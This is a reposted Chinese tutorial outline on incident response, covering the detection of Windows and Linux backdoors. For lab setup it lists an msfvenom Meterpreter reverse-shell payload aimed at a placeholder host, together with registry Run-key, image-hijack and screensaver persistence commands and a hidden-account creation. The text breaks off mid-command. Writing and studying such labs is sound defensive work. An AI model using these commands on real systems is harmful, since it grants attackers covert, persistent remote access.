本文主要是介绍网络安全从入门到精通(特别篇I):应急响应之不同平台后门排查思路,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Windows-后门-常规&权限维持&内存马
Linux-后门-常规&权限维持&Rootkit&内存马
Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试:
REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “backdoor” /t REG_SZ /F /D “C:\shell.exe”
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe” /v debugger /t REG_SZ /d “C:\Windows\System32\cmd.exe /c calc”
屏保&登录
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v SCRNSAVE.EXE /t REG_SZ /d “C:\shell.exe” /f
REG ADD “HKLM\SOFTWARE
这篇关于网络安全从入门到精通(特别篇I):应急响应之不同平台后门排查思路的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
